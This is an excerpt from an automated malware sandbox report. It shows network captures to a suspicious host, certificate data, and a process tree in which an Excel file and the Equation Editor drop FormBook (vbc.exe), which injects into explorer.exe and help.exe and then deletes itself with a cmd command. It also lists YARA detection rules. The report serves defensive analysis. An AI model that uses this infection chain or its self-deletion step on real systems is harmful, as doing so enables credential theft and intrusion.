                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    Apr 12, 2021 11:39:50.062820911 CEST299INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Mon, 12 Apr 2021 09:39:50 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Content-Length: 329
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Location: http://www.starr2021.com/aqu2?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&Yzrt=nN6d4T
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 74 61 72 72 32 30 32 31 2e 63 6f 6d 2f 61 71 75 32 3f 4e 50 3d 46 44 53 54 69 5a 71 53 2f 37 77 75 35 36 78 72 35 75 64 31 58 74 59 45 44 56 4a 44 63 59 36 4a 53 78 47 36 73 32 5a 36 31 34 71 34 5a 4e 4c 4e 52 37 6f 74 50 76 65 71 47 48 31 6a 36 6f 62 68 70 59 37 76 32 77 3d 3d 26 61 6d 70 3b 59 7a 72 74 3d 6e 4e 36 64 34 54 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.starr2021.com/aqu2?NP=FDSTiZqS/7wu56xr5ud1XtYEDVJDcY6JSxG6s2Z614q4ZNLNR7otPveqGH1j6obhpY7v2w==&amp;Yzrt=nN6d4T">here</a>.</p></body></html>


                                                                                                                                                                                                    HTTPS Packets

                                                                                                                                                                                                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                                                                    Apr 12, 2021 11:38:06.606409073 CEST52.59.165.42443192.168.2.2249167CN=*.short.gy CN=R3, O=Let's Encrypt, C=USCN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Jan 23 20:36:49 CET 2021 Wed Oct 07 21:21:40 CEST 2020Fri Apr 23 21:36:49 CEST 2021 Wed Sep 29 21:21:40 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                                                                                                                                                                                    CN=R3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Wed Oct 07 21:21:40 CEST 2020Wed Sep 29 21:21:40 CEST 2021

                                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                    Analysis Process: EXCEL.EXE PID: 2316 Parent PID: 584

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:11:37:45
                                                                                                                                                                                                    Start date:12/04/2021
                                                                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                    Imagebase:0x13fe70000
                                                                                                                                                                                                    File size:27641504 bytes
                                                                                                                                                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: EQNEDT32.EXE PID: 2592 Parent PID: 584

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:11:38:09
                                                                                                                                                                                                    Start date:12/04/2021
                                                                                                                                                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:543304 bytes
                                                                                                                                                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: vbc.exe PID: 2968 Parent PID: 2592

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:11:38:15
                                                                                                                                                                                                    Start date:12/04/2021
                                                                                                                                                                                                    Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:206065 bytes
                                                                                                                                                                                                    MD5 hash:2C64897AA30694CC768F5EA375157932
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2189177238.0000000002E30000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 16%, Metadefender, Browse
                                                                                                                                                                                                    • Detection: 76%, ReversingLabs
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Analysis Process: vbc.exe PID: 2924 Parent PID: 2968

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:11:38:16
                                                                                                                                                                                                    Start date:12/04/2021
                                                                                                                                                                                                    Path:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                    File size:206065 bytes
                                                                                                                                                                                                    MD5 hash:2C64897AA30694CC768F5EA375157932
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218508028.0000000000840000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218365753.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2173696471.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2218285281.0000000000290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    Reputation:low

                                                                                                                                                                                                    Analysis Process: explorer.exe PID: 1388 Parent PID: 2924

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:11:38:25
                                                                                                                                                                                                    Start date:12/04/2021
                                                                                                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:
                                                                                                                                                                                                    Imagebase:0xffca0000
                                                                                                                                                                                                    File size:3229696 bytes
                                                                                                                                                                                                    MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Analysis Process: help.exe PID: 1688 Parent PID: 1388

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:11:38:38
                                                                                                                                                                                                    Start date:12/04/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\help.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                                                                                                                    Imagebase:0xb00000
                                                                                                                                                                                                    File size:8704 bytes
                                                                                                                                                                                                    MD5 hash:0F488C73AA50C2FC1361F19E8FC19926
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2373202955.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2373291776.0000000000160000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2373330505.00000000001E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                                    Analysis Process: cmd.exe PID: 1836 Parent PID: 1688

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Start time:11:38:44
                                                                                                                                                                                                    Start date:12/04/2021
                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                    Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                                                                    Imagebase:0x4a5a0000
                                                                                                                                                                                                    File size:302592 bytes
                                                                                                                                                                                                    MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                                    Reset < >